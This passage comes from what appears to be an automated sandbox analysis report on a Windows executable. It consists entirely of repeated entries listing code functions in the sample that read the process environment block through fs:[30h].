          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]2_2_00BC52A5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]2_2_00BC52A5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFD294 mov eax, dword ptr fs:[00000030h]2_2_00BFD294
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFD294 mov eax, dword ptr fs:[00000030h]2_2_00BFD294
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2AE4 mov eax, dword ptr fs:[00000030h]2_2_00BF2AE4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2ACB mov eax, dword ptr fs:[00000030h]2_2_00BF2ACB
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C54257 mov eax, dword ptr fs:[00000030h]2_2_00C54257
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]2_2_00BEA229
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8EA55 mov eax, dword ptr fs:[00000030h]2_2_00C8EA55
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE3A1C mov eax, dword ptr fs:[00000030h]2_2_00BE3A1C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7B260 mov eax, dword ptr fs:[00000030h]2_2_00C7B260
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7B260 mov eax, dword ptr fs:[00000030h]2_2_00C7B260
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCAA16 mov eax, dword ptr fs:[00000030h]2_2_00BCAA16
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCAA16 mov eax, dword ptr fs:[00000030h]2_2_00BCAA16
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98A62 mov eax, dword ptr fs:[00000030h]2_2_00C98A62
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]2_2_00BC5210
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov ecx, dword ptr fs:[00000030h]2_2_00BC5210
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]2_2_00BC5210
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]2_2_00BC5210
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD8A0A mov eax, dword ptr fs:[00000030h]2_2_00BD8A0A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0927A mov eax, dword ptr fs:[00000030h]2_2_00C0927A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AA16 mov eax, dword ptr fs:[00000030h]2_2_00C8AA16
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AA16 mov eax, dword ptr fs:[00000030h]2_2_00C8AA16
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C04A2C mov eax, dword ptr fs:[00000030h]2_2_00C04A2C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C04A2C mov eax, dword ptr fs:[00000030h]2_2_00C04A2C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]2_2_00BC9240
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]2_2_00BC9240
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]2_2_00BC9240
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]2_2_00BC9240
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C453CA mov eax, dword ptr fs:[00000030h]2_2_00C453CA
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C453CA mov eax, dword ptr fs:[00000030h]2_2_00C453CA
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]2_2_00BF4BAD
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]2_2_00BF4BAD
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]2_2_00BF4BAD
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3 mov ecx, dword ptr fs:[00000030h]2_2_00C723E3
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3 mov ecx, dword ptr fs:[00000030h]2_2_00C723E3
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3 mov eax, dword ptr fs:[00000030h]2_2_00C723E3
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2397 mov eax, dword ptr fs:[00000030h]2_2_00BF2397
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFB390 mov eax, dword ptr fs:[00000030h]2_2_00BFB390
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD1B8F mov eax, dword ptr fs:[00000030h]2_2_00BD1B8F
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD1B8F mov eax, dword ptr fs:[00000030h]2_2_00BD1B8F
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8138A mov eax, dword ptr fs:[00000030h]2_2_00C8138A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7D380 mov ecx, dword ptr fs:[00000030h]2_2_00C7D380
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEDBE9 mov eax, dword ptr fs:[00000030h]2_2_00BEDBE9
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]2_2_00BF03E2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]2_2_00BF03E2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]2_2_00BF03E2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]2_2_00BF03E2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]2_2_00BF03E2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]2_2_00BF03E2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C95BA5 mov eax, dword ptr fs:[00000030h]2_2_00C95BA5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98B58 mov eax, dword ptr fs:[00000030h]2_2_00C98B58
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF3B7A mov eax, dword ptr fs:[00000030h]2_2_00BF3B7A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF3B7A mov eax, dword ptr fs:[00000030h]2_2_00BF3B7A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8131B mov eax, dword ptr fs:[00000030h]2_2_00C8131B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCDB60 mov ecx, dword ptr fs:[00000030h]2_2_00BCDB60
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCF358 mov eax, dword ptr fs:[00000030h]2_2_00BCF358
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCDB40 mov eax, dword ptr fs:[00000030h]2_2_00BCDB40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98CD6 mov eax, dword ptr fs:[00000030h]2_2_00C98CD6
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD849B mov eax, dword ptr fs:[00000030h]2_2_00BD849B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C814FB mov eax, dword ptr fs:[00000030h]2_2_00C814FB
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]2_2_00C46CF0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]2_2_00C46CF0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]2_2_00C46CF0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFBC2C mov eax, dword ptr fs:[00000030h]2_2_00BFBC2C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5C450 mov eax, dword ptr fs:[00000030h]2_2_00C5C450
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5C450 mov eax, dword ptr fs:[00000030h]2_2_00C5C450
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]2_2_00C9740D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]2_2_00C9740D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]2_2_00C9740D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]2_2_00BFAC7B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]2_2_00C81C06
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]2_2_00C46C0A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]2_2_00C46C0A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]2_2_00C46C0A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]2_2_00C46C0A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE746D mov eax, dword ptr fs:[00000030h]2_2_00BE746D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA44B mov eax, dword ptr fs:[00000030h]2_2_00BFA44B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]2_2_00BF1DB5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]2_2_00BF1DB5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]2_2_00BF1DB5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]2_2_00C46DC9
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]2_2_00C46DC9
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]2_2_00C46DC9
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov ecx, dword ptr fs:[00000030h]2_2_00C46DC9
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]2_2_00C46DC9
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]2_2_00C46DC9
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF35A1 mov eax, dword ptr fs:[00000030h]2_2_00BF35A1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFD9B mov eax, dword ptr fs:[00000030h]2_2_00BFFD9B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFD9B mov eax, dword ptr fs:[00000030h]2_2_00BFFD9B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C8FDE2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C8FDE2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C8FDE2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C8FDE2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C78DF1 mov eax, dword ptr fs:[00000030h]2_2_00C78DF1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]2_2_00BC2D8A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]2_2_00BC2D8A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]2_2_00BC2D8A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]2_2_00BC2D8A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]2_2_00BC2D8A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]2_2_00BF2581
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]2_2_00BF2581
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]2_2_00BF2581
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]2_2_00BF2581
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0 mov eax, dword ptr fs:[00000030h]2_2_00BDD5E0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0 mov eax, dword ptr fs:[00000030h]2_2_00BDD5E0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C905AC mov eax, dword ptr fs:[00000030h]2_2_00C905AC
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C905AC mov eax, dword ptr fs:[00000030h]2_2_00C905AC
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C03D43 mov eax, dword ptr fs:[00000030h]2_2_00C03D43
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]2_2_00BF4D3B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]2_2_00BF4D3B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]2_2_00BF4D3B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C43540 mov eax, dword ptr fs:[00000030h]2_2_00C43540
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C73D40 mov eax, dword ptr fs:[00000030h]2_2_00C73D40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
